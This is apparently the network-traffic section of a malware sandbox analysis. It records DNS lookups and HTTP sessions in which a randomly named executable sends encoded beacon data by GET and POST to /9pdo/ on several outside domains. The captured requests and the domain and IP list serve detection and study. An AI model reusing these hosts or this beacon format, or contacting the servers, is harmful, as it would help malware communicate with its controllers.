                                                                      Apr 25, 2024 19:25:26.060065985 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:26.060147047 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:26.060158968 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:26.060266018 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:26.060400009 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:26.060415030 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:26.060566902 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:26.060573101 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:26.060899973 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:26.060919046 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:26.060970068 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:26.060970068 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:26.060976982 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:26.061033964 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:26.061033964 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:26.061319113 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:26.061332941 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:26.061511993 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:26.061517954 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:26.061665058 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:26.061793089 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:26.061806917 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:26.062005997 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:26.062011003 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:26.062094927 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:26.090014935 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:26.090033054 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:26.090173960 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:26.090183020 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:26.090240955 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:26.298460960 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:26.298486948 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:26.298613071 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:26.298633099 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:26.298644066 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:26.298651934 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:26.298736095 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:26.298743010 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:26.298832893 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:26.299320936 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:26.299341917 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:49.463134050 CEST4970780192.168.2.10112.175.50.218
                                                                      Apr 25, 2024 19:25:49.746129036 CEST8049707112.175.50.218192.168.2.10
                                                                      Apr 25, 2024 19:25:49.746237040 CEST4970780192.168.2.10112.175.50.218
                                                                      Apr 25, 2024 19:25:49.748930931 CEST4970780192.168.2.10112.175.50.218
                                                                      Apr 25, 2024 19:25:50.032233000 CEST8049707112.175.50.218192.168.2.10
                                                                      Apr 25, 2024 19:25:50.050057888 CEST8049707112.175.50.218192.168.2.10
                                                                      Apr 25, 2024 19:25:50.050247908 CEST8049707112.175.50.218192.168.2.10
                                                                      Apr 25, 2024 19:25:50.050263882 CEST8049707112.175.50.218192.168.2.10
                                                                      Apr 25, 2024 19:25:50.050296068 CEST4970780192.168.2.10112.175.50.218
                                                                      Apr 25, 2024 19:25:50.050328970 CEST4970780192.168.2.10112.175.50.218
                                                                      Apr 25, 2024 19:25:50.055763006 CEST4970780192.168.2.10112.175.50.218
                                                                      Apr 25, 2024 19:25:50.338699102 CEST8049707112.175.50.218192.168.2.10
                                                                      Apr 25, 2024 19:26:05.334088087 CEST4970880192.168.2.10217.160.0.183
                                                                      Apr 25, 2024 19:26:05.547240973 CEST8049708217.160.0.183192.168.2.10
                                                                      Apr 25, 2024 19:26:05.547529936 CEST4970880192.168.2.10217.160.0.183
                                                                      Apr 25, 2024 19:26:05.549998999 CEST4970880192.168.2.10217.160.0.183
                                                                      Apr 25, 2024 19:26:05.763122082 CEST8049708217.160.0.183192.168.2.10
                                                                      Apr 25, 2024 19:26:05.777693033 CEST8049708217.160.0.183192.168.2.10
                                                                      Apr 25, 2024 19:26:05.777710915 CEST8049708217.160.0.183192.168.2.10
                                                                      Apr 25, 2024 19:26:05.777761936 CEST4970880192.168.2.10217.160.0.183
                                                                      Apr 25, 2024 19:26:07.055322886 CEST4970880192.168.2.10217.160.0.183
                                                                      Apr 25, 2024 19:26:08.293977976 CEST4970980192.168.2.10217.160.0.183
                                                                      Apr 25, 2024 19:26:08.508800030 CEST8049709217.160.0.183192.168.2.10
                                                                      Apr 25, 2024 19:26:08.510369062 CEST4970980192.168.2.10217.160.0.183
                                                                      Apr 25, 2024 19:26:08.512161970 CEST4970980192.168.2.10217.160.0.183
                                                                      Apr 25, 2024 19:26:08.726849079 CEST8049709217.160.0.183192.168.2.10
                                                                      Apr 25, 2024 19:26:08.732366085 CEST8049709217.160.0.183192.168.2.10
                                                                      Apr 25, 2024 19:26:08.732383966 CEST8049709217.160.0.183192.168.2.10
                                                                      Apr 25, 2024 19:26:08.732485056 CEST4970980192.168.2.10217.160.0.183
                                                                      Apr 25, 2024 19:26:10.024216890 CEST4970980192.168.2.10217.160.0.183
                                                                      Apr 25, 2024 19:26:11.043456078 CEST4971080192.168.2.10217.160.0.183
                                                                      Apr 25, 2024 19:26:11.260081053 CEST8049710217.160.0.183192.168.2.10
                                                                      Apr 25, 2024 19:26:11.260219097 CEST4971080192.168.2.10217.160.0.183
                                                                      Apr 25, 2024 19:26:11.262888908 CEST4971080192.168.2.10217.160.0.183
                                                                      Apr 25, 2024 19:26:11.479343891 CEST8049710217.160.0.183192.168.2.10
                                                                      Apr 25, 2024 19:26:11.479363918 CEST8049710217.160.0.183192.168.2.10
                                                                      Apr 25, 2024 19:26:11.491929054 CEST8049710217.160.0.183192.168.2.10
                                                                      Apr 25, 2024 19:26:11.491976976 CEST8049710217.160.0.183192.168.2.10
                                                                      Apr 25, 2024 19:26:11.492065907 CEST4971080192.168.2.10217.160.0.183
                                                                      Apr 25, 2024 19:26:12.774044991 CEST4971080192.168.2.10217.160.0.183
                                                                      Apr 25, 2024 19:26:13.792857885 CEST4971180192.168.2.10217.160.0.183
                                                                      Apr 25, 2024 19:26:14.009279966 CEST8049711217.160.0.183192.168.2.10
                                                                      Apr 25, 2024 19:26:14.009371996 CEST4971180192.168.2.10217.160.0.183
                                                                      Apr 25, 2024 19:26:14.011388063 CEST4971180192.168.2.10217.160.0.183
                                                                      Apr 25, 2024 19:26:14.227672100 CEST8049711217.160.0.183192.168.2.10
                                                                      Apr 25, 2024 19:26:14.232901096 CEST8049711217.160.0.183192.168.2.10
                                                                      Apr 25, 2024 19:26:14.233191967 CEST8049711217.160.0.183192.168.2.10
                                                                      Apr 25, 2024 19:26:14.233263016 CEST4971180192.168.2.10217.160.0.183
                                                                      Apr 25, 2024 19:26:14.235801935 CEST4971180192.168.2.10217.160.0.183
                                                                      Apr 25, 2024 19:26:14.452094078 CEST8049711217.160.0.183192.168.2.10
                                                                      Apr 25, 2024 19:26:20.100893021 CEST4971280192.168.2.10219.94.128.41
                                                                      Apr 25, 2024 19:26:20.371455908 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:20.371637106 CEST4971280192.168.2.10219.94.128.41
                                                                      Apr 25, 2024 19:26:20.373632908 CEST4971280192.168.2.10219.94.128.41
                                                                      Apr 25, 2024 19:26:20.642225981 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:20.681103945 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:20.767047882 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:20.767074108 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:20.767086983 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:20.767157078 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:20.767194986 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:20.767225027 CEST4971280192.168.2.10219.94.128.41
                                                                      Apr 25, 2024 19:26:20.767270088 CEST4971280192.168.2.10219.94.128.41
                                                                      Apr 25, 2024 19:26:20.767293930 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:20.767318010 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:20.767338991 CEST4971280192.168.2.10219.94.128.41
                                                                      Apr 25, 2024 19:26:20.767393112 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:20.767436981 CEST4971280192.168.2.10219.94.128.41
                                                                      Apr 25, 2024 19:26:20.767798901 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:20.767815113 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:20.767854929 CEST4971280192.168.2.10219.94.128.41
                                                                      Apr 25, 2024 19:26:21.037709951 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:21.037729025 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:21.037744045 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:21.037789106 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:21.037826061 CEST4971280192.168.2.10219.94.128.41
                                                                      Apr 25, 2024 19:26:21.037847996 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:21.037864923 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:21.037878990 CEST4971280192.168.2.10219.94.128.41
                                                                      Apr 25, 2024 19:26:21.037883043 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:21.037900925 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:21.037920952 CEST4971280192.168.2.10219.94.128.41
                                                                      Apr 25, 2024 19:26:21.037928104 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:21.037944078 CEST4971280192.168.2.10219.94.128.41
                                                                      Apr 25, 2024 19:26:21.037945986 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:21.037985086 CEST4971280192.168.2.10219.94.128.41
                                                                      Apr 25, 2024 19:26:21.038000107 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:21.038033009 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:21.038074970 CEST4971280192.168.2.10219.94.128.41
                                                                      Apr 25, 2024 19:26:21.038080931 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:21.038108110 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:21.038165092 CEST4971280192.168.2.10219.94.128.41
                                                                      Apr 25, 2024 19:26:21.038245916 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:21.038444996 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:21.038459063 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:21.038475037 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:21.038489103 CEST4971280192.168.2.10219.94.128.41
                                                                      Apr 25, 2024 19:26:21.038489103 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:21.038521051 CEST4971280192.168.2.10219.94.128.41
                                                                      Apr 25, 2024 19:26:21.086395025 CEST4971280192.168.2.10219.94.128.41
                                                                      Apr 25, 2024 19:26:21.308274984 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:21.308383942 CEST4971280192.168.2.10219.94.128.41
                                                                      Apr 25, 2024 19:26:22.477163076 CEST4971280192.168.2.10219.94.128.41
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 25, 2024 19:25:23.872199059 CEST | 51064 | 53 | 192.168.2.10 | 1.1.1.1
Apr 25, 2024 19:25:24.372607946 CEST | 53 | 51064 | 1.1.1.1 | 192.168.2.10
Apr 25, 2024 19:25:48.691042900 CEST | 59220 | 53 | 192.168.2.10 | 1.1.1.1
Apr 25, 2024 19:25:49.456856012 CEST | 53 | 59220 | 1.1.1.1 | 192.168.2.10
Apr 25, 2024 19:26:05.105806112 CEST | 64924 | 53 | 192.168.2.10 | 1.1.1.1
Apr 25, 2024 19:26:05.330861092 CEST | 53 | 64924 | 1.1.1.1 | 192.168.2.10
Apr 25, 2024 19:26:19.247309923 CEST | 58977 | 53 | 192.168.2.10 | 1.1.1.1
Apr 25, 2024 19:26:20.097971916 CEST | 53 | 58977 | 1.1.1.1 | 192.168.2.10

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 25, 2024 19:25:23.872199059 CEST | 192.168.2.10 | 1.1.1.1 | 0x9a52 | Standard query (0) | kraljevikonaci.rs | A (IP address) | IN (0x0001) | false
Apr 25, 2024 19:25:48.691042900 CEST | 192.168.2.10 | 1.1.1.1 | 0x3285 | Standard query (0) | www.ejbodyart.com | A (IP address) | IN (0x0001) | false
Apr 25, 2024 19:26:05.105806112 CEST | 192.168.2.10 | 1.1.1.1 | 0x5394 | Standard query (0) | www.jt-berger.store | A (IP address) | IN (0x0001) | false
Apr 25, 2024 19:26:19.247309923 CEST | 192.168.2.10 | 1.1.1.1 | 0x7f27 | Standard query (0) | www.n-benriya002.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 25, 2024 19:25:24.372607946 CEST | 1.1.1.1 | 192.168.2.10 | 0x9a52 | No error (0) | kraljevikonaci.rs | | 195.252.110.253 | A (IP address) | IN (0x0001) | false
Apr 25, 2024 19:25:49.456856012 CEST | 1.1.1.1 | 192.168.2.10 | 0x3285 | No error (0) | www.ejbodyart.com | ejbodyart.com | | CNAME (Canonical name) | IN (0x0001) | false
Apr 25, 2024 19:25:49.456856012 CEST | 1.1.1.1 | 192.168.2.10 | 0x3285 | No error (0) | ejbodyart.com | | 112.175.50.218 | A (IP address) | IN (0x0001) | false
Apr 25, 2024 19:26:05.330861092 CEST | 1.1.1.1 | 192.168.2.10 | 0x5394 | No error (0) | www.jt-berger.store | | 217.160.0.183 | A (IP address) | IN (0x0001) | false
Apr 25, 2024 19:26:20.097971916 CEST | 1.1.1.1 | 192.168.2.10 | 0x7f27 | No error (0) | www.n-benriya002.com | n-benriya002.com | | CNAME (Canonical name) | IN (0x0001) | false
Apr 25, 2024 19:26:20.097971916 CEST | 1.1.1.1 | 192.168.2.10 | 0x7f27 | No error (0) | n-benriya002.com | | 219.94.128.41 | A (IP address) | IN (0x0001) | false

• kraljevikonaci.rs
• www.ejbodyart.com
• www.jt-berger.store
• www.n-benriya002.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49707 | 112.175.50.218 | 80 | 5852 | C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe
Timestamp | Bytes transferred | Direction | Data
Apr 25, 2024 19:25:49.748930931 CEST | 471 | OUT | GET /9pdo/?U06lIV=DnYaRovP48GzkkJ0SsWJ4MnlEFB7/DbwuVP/6iFiedv+ORSC+0oTk/Kl1D7Kx2hOtjeczUyzMCTs4BuiBiMV1f4J24UrdDssz4r6IbwvRD0aCWqy3Q==&VbTh4=rjJH3N1 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-us
Connection: close
Host: www.ejbodyart.com
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
Apr 25, 2024 19:25:50.050057888 CEST | 398 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 25 Apr 2024 17:25:49 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
                                                                      Data Raw: 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 70 64 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a 0d 0a
                                                                      Data Ascii: c7<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /9pdo/ was not found on this server.<P></BODY></HTML>
Apr 25, 2024 19:25:50.050247908 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.10 | 49708 | 217.160.0.183 | 80 | 5852 | C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe
Timestamp | Bytes transferred | Direction | Data
Apr 25, 2024 19:26:05.549998999 CEST | 741 | OUT | POST /9pdo/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Content-Length: 195
Connection: close
Cache-Control: no-cache
Host: www.jt-berger.store
Origin: http://www.jt-berger.store
Referer: http://www.jt-berger.store/9pdo/
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
                                                                      Data Ascii: U06lIV=w9/X/ZL56raZ4hV39Ex2/pEv1ESNbStWWUVrRf8OH6DChAv/LkAhlbXI3JykoWSDcXk17FJvjfBkTxDhNm6m+7KiD9pGw5u1kl64fwmqtW4qz92SBkvcvmxjAYoaCcNV8VW84yXw7v7XtZXWh0fGRslsrEEsrF3i0KwLL/BQrr4JizZvZz8IBeAv+jjw
                                                                      Apr 25, 2024 19:26:05.777693033 CEST | 558 | IN | HTTP/1.1 404 Not Found
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Date: Thu, 25 Apr 2024 17:26:05 GMT
                                                                      Server: Apache
                                                                      Content-Encoding: gzip
                                                                      Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      2 | 192.168.2.10 | 49709 | 217.160.0.183 | 80 | 5852 | C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Apr 25, 2024 19:26:08.512161970 CEST | 765 | OUT | POST /9pdo/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 219
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Host: www.jt-berger.store
                                                                      Origin: http://www.jt-berger.store
                                                                      Referer: http://www.jt-berger.store/9pdo/
                                                                      User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
                                                                      Data Ascii: U06lIV=w9/X/ZL56raZ5Bl37jl22pEo7kSNSytNWUZrRaFTAPbCglr/KlAho7XI8pyhsWSdcXpG7HdvjfVkTxzhMWGl+rKkJtp+/Zu1kl64fwz9tSUqzI+SAFvThGxgI4oaI8NZ8VWC4z7W7sDXtYnWhlfHbslu10FDvhvr+JcyC/Bn77gJlS4oIidfSpchwlWa3kkPvZ+KT2c6pESXwa1wVA==
                                                                      Apr 25, 2024 19:26:08.732366085 CEST | 558 | IN | HTTP/1.1 404 Not Found
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Date: Thu, 25 Apr 2024 17:26:08 GMT
                                                                      Server: Apache
                                                                      Content-Encoding: gzip
                                                                      Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      3 | 192.168.2.10 | 49710 | 217.160.0.183 | 80 | 5852 | C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Apr 25, 2024 19:26:11.262888908 CEST | 1778 | OUT | POST /9pdo/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 1231
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Host: www.jt-berger.store
                                                                      Origin: http://www.jt-berger.store
                                                                      Referer: http://www.jt-berger.store/9pdo/
                                                                      User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
                                                                      Data Ascii: U06lIV=…
                                                                      Apr 25, 2024 19:26:11.491929054 CEST | 558 | IN | HTTP/1.1 404 Not Found
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Date: Thu, 25 Apr 2024 17:26:11 GMT
                                                                      Server: Apache
                                                                      Content-Encoding: gzip
                                                                      Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      4 | 192.168.2.10 | 49711 | 217.160.0.183 | 80 | 5852 | C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Apr 25, 2024 19:26:14.011388063 CEST | 473 | OUT | GET /9pdo/?U06lIV=9/X38tn9qLO2xSFr83Mmx4ws3CHxUFQCRmtcXfkuabXCkgKRDBhcw5zs5NSemU/1fww/nV1egvBpaCqwFnieo+CDMv1CzJiFlGe2VwbVhWcu3PKwdg==&VbTh4=rjJH3N1 HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                      Accept-Language: en-us
                                                                      Connection: close
                                                                      Host: www.jt-berger.store
                                                                      User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
                                                                      Apr 25, 2024 19:26:14.232901096 CEST | 745 | IN | HTTP/1.1 404 Not Found
                                                                      Content-Type: text/html
                                                                      Content-Length: 601
                                                                      Connection: close
                                                                      Date: Thu, 25 Apr 2024 17:26:14 GMT
                                                                      Server: Apache
                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      5 | 192.168.2.10 | 49712 | 219.94.128.41 | 80 | 5852 | C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Apr 25, 2024 19:26:20.373632908 CEST | 744 | OUT | POST /9pdo/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 195
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Host: www.n-benriya002.com
                                                                      Origin: http://www.n-benriya002.com
                                                                      Referer: http://www.n-benriya002.com/9pdo/
                                                                      User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
                                                                      Data Ascii: U06lIV=cGsHnhOr/XEd+QxoIHcDGp+dwvWXKlUN14DPY4FHG2YxPGstOAq6gUR4fZQw91kjb/8U7MFzMHRgxuDAPNko/fia+mJHVrXgPMNvSDU+x95aXGqCRlw73pkYlQ3vEfCwF1p0jiCbY8rg6+9amA0gXUUB7/O7ybmUNnm/6tWWawYc49xi0ao1wiOzqrzo
                                                                      Apr 25, 2024 19:26:20.767047882 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                      Server: nginx
                                                                      Date: Thu, 25 Apr 2024 17:26:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                      Link: <https://n-benriya002.com/wp-json/>; rel="https://api.w.org/"
